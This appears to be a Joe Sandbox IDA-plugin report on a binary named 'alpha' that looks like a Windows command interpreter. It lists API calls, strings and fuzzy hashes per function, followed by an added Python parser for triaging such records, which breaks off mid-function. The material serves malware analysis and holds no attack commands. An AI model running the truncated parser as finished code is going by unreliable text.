                                                                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                              • API String ID: 3223794493-3086019870
                                                                              • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                              • Instruction ID: 0427b578970d2596bef461b78c58bc03cab40ee40cbc27fdd12783dd265ae501
                                                                              • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                              • Instruction Fuzzy Hash: BD515961A0CA42CAEA58BF15E810179BBA0FB4DB90F589535CA3E873B2DF7CE445C710
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                              • API String ID: 0-3124875276
                                                                              • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                              • Instruction ID: 1c8558516e8191a6c8f1ecf0d94e6ec90a34152620be57bc96718cf7dcd7491b
                                                                              • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                              • Instruction Fuzzy Hash: 99516A60B0C643C2FB2CBF25F4046B8B695AF4EB45F408035C62EC62B6DFBDA40A8750
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                              • String ID: 0123456789
                                                                              • API String ID: 1606811317-2793719750
                                                                              • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                              • Instruction ID: 5bd1db9cfd417fce15dd712f968621ed28c6d41b220ac6234d8a0d7f17d1f66d
                                                                              • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                              • Instruction Fuzzy Hash: F3D15C61E0CB8685EA18BF25E844279B6A0FB4D794F489132DA6D977F6DF3CE405CB00
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                              • String ID: \\.\
                                                                              • API String ID: 799470305-2900601889
                                                                              • Opcode ID: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                                                                              • Instruction ID: 0a1b70ac01b9e181920d61cf4f7cdd52ced3d37a9205530d12b0551968c65d24
                                                                              • Opcode Fuzzy Hash: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                                                                              • Instruction Fuzzy Hash: 2851B232B1CA82C5EB68BF21E8002B9B7A0FB8DB54F558535DA2D877A6DF7CD4458300
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                              • String ID:
                                                                              • API String ID: 1944892715-0
                                                                              • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                              • Instruction ID: 1932ddb1c5770240f11c78a4328793d61268b044aa8a29a8fb5b2a0d10477bd3
                                                                              • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                              • Instruction Fuzzy Hash: DBB15E61A0D642C6FA68BF11E454179E6A1BF4DB80F589536CA6E873F2EF7CE8408710
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                                • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                                • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                                • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                                • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                                • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B5654DE
                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B56552B
                                                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B56554F
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B58345F
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B58347E
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B5834C3
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B5834DB
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B5834FA
                                                                                • Part of subcall function 00007FF64B5736EC: _get_osfhandle.MSVCRT ref: 00007FF64B573715
                                                                                • Part of subcall function 00007FF64B5736EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B573770
                                                                                • Part of subcall function 00007FF64B5736EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B573791
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                              • String ID:
                                                                              • API String ID: 1356649289-0
                                                                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                              • Instruction ID: c3f81f095b75f21ff30f2cdc11a17b63d308fd129ed31a35b94ad1b1148a36ae
                                                                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                              • Instruction Fuzzy Hash: EF915E72A1C642CAE628BF25E404179F7A1FB9DB94F445135DA6E83676DF3CD450CB00
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B5758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF64B58C6DB), ref: 00007FF64B5758EF
                                                                                • Part of subcall function 00007FF64B57081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B57084E
                                                                              • towupper.MSVCRT ref: 00007FF64B58C1C9
                                                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B58C31C
                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF64B58C5CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                              • String ID: %s $%s>$PROMPT$Unknown$\$x
                                                                              • API String ID: 2242554020-3610052186
                                                                              • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                              • Instruction ID: f11400d060b1cfc7c9125889a08ce2c1b181997c4bcc62231f6086f0e8557229
                                                                              • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                              • Instruction Fuzzy Hash: DD129361A2C64281EA68BF19E44417AE7B0EF48BA0F544235D97E877F2DF3CE55AC700
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                              • String ID: %s$/-.$:
                                                                              • API String ID: 1644023181-879152773
                                                                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                              • Instruction ID: e9ffe8afff281602c2e4c0d1adb7c6e366b3962fd9d6025d625d8fad65087297
                                                                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                              • Instruction Fuzzy Hash: 7491A162B2C64282EB58BF64D4402B9E3A0FF88BD4F844535D96EC26F6EE3CE555C700
                                                                              APIs
                                                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B587251), ref: 00007FF64B58628E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSingleWait
                                                                              • String ID: wil
                                                                              • API String ID: 24740636-1589926490
                                                                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                              • Instruction ID: 1008fe4bbbc9a92aafccb54a1371dbddf41374213b56f58059685120b195c327
                                                                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                              • Instruction Fuzzy Hash: 09415021A1C642C7F3287F15E400379A6A1EF89781F609531D92AC7AB6CF3DD855CB01
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                              • String ID: :$\
                                                                              • API String ID: 3961617410-1166558509
                                                                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                              • Instruction ID: 94bf959db16c604a1e2a24acfe1d084ffff96dab9ffbfaa15f72eb99cf69c0b5
                                                                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                              • Instruction Fuzzy Hash: B4217F62A0C642C6E7587F60E444079E6A1EB8DB94B44A231DA2FC73B2EF7CD8458A00
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B5725CA
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B5725E8
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B57260F
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B572636
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B572650
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$Heap$AllocProcess
                                                                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                              • API String ID: 3407644289-1668778490
                                                                              • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                              • Instruction ID: 1ebc6d9c6e7c3c0724b7b8ad050f269c6da3cbe88e27215bb4be614a906ec6d1
                                                                              • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                              • Instruction Fuzzy Hash: 39314C61A1C642C6FB28BF21F811279E6A5AB4DB40F54C435D62EC62B7DE7DE4018611
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                              • String ID: &()[]{}^=;!%'+,`~
                                                                              • API String ID: 2516562204-381716982
                                                                              • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                              • Instruction ID: 211b30b173a4214a734e05e79fd2719b80311f746e285ad1d019110f38af25d2
                                                                              • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                              • Instruction Fuzzy Hash: 29C1AD72A09791C6EB58BF25E8402BEB7A0FB48B94F445125DE9D83BA9DF3CE451C700
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
                                                                                • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
                                                                                • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
                                                                              • iswspace.MSVCRT ref: 00007FF64B577EEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                                                              • String ID: A
                                                                              • API String ID: 3731854180-3554254475
                                                                              • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                              • Instruction ID: 944ccc4c5e5ff95b66b1848ee07d77a9172d2b8be708d5785fb7f8d02a9f339e
                                                                              • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                              • Instruction Fuzzy Hash: 54A17E21A0D68289E668BF21E850679FAA0FF4D790F048034CA6DC77B6DF7CE451CB10
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                              • API String ID: 1580871199-2613899276
                                                                              • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                              • Instruction ID: 4ce8c4ae148f1cbf121a21d311dffeeb487166b0435f4bb2608ad32a17fdde6d
                                                                              • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                              • Instruction Fuzzy Hash: 42514C71A2DB82C6EB54BF15E800269A7A4FF88B84F445135DA6E83B65DF3CD452CB00
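The records in this view all follow one layout: an APIs list (direct calls plus "Part of subcall function" lines), a String ID in which the referenced strings are joined with "$", the memory dump source, and the opcode and instruction fuzzy hashes. As an added example that is not part of the Joe Sandbox report or its tooling, the Python below parses that layout and runs a small watchlist pass over the result, so that records such as the one above (NTDLL.DLL / NtQueryInformationProcess) can be pulled out of a long report mechanically. SAMPLE holds two records copied from this section (indentation and link labels removed); the watchlist contents and the names parse_records, triage and shared_functions are this example's own assumptions, and the "$"-joined string convention is inferred from the records here, not from any Joe Sandbox documentation.

```python
"""Parse the per-function records of the Joe Sandbox IDA plugin view (the layout of this
section) and run a watchlist pass over them.  Added example, not Joe Sandbox code: SAMPLE is
two records copied from this section; the watchlists are an analyst's assumption."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

SAMPLE = r"""APIs
• Part of subcall function 00007FF64B5758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF64B58C6DB), ref: 00007FF64B5758EF
• Part of subcall function 00007FF64B57081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B57084E
• towupper.MSVCRT ref: 00007FF64B58C1C9
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B58C31C
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF64B58C5CB
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
Similarity
• API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
• String ID: %s $%s>$PROMPT$Unknown$\$x
• Instruction Fuzzy Hash: DD129361A2C64281EA68BF19E44417AE7B0EF48BA0F544235D97E877F2DF3CE55AC700
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• Instruction Fuzzy Hash: 42514C71A2DB82C6EB54BF15E800269A7A4FF88B84F445135DA6E83B65DF3CD452CB00
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function <addr>: ]<api>.<module>[(<args>)][,] ref: <addr>"
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>[A-Za-z_]\w*)"
    r"\.(?P<module>[\w.-]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
# "• <Key>: <value>"; the key is letters and spaces only, so subcall lines never land here
KV_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                    # call-site address
    via_subcall: Optional[int]  # sub-function address for "Part of subcall" lines, else None


@dataclass
class FunctionRecord:
    api_calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)  # repeated keys keep the last value

    @property
    def instruction_fuzzy_hash(self) -> str:
        return self.meta.get("Instruction Fuzzy Hash", "")


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":        # every record in this view opens with the APIs header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line or line in HEADERS:
            continue
        m = API_LINE.match(line)
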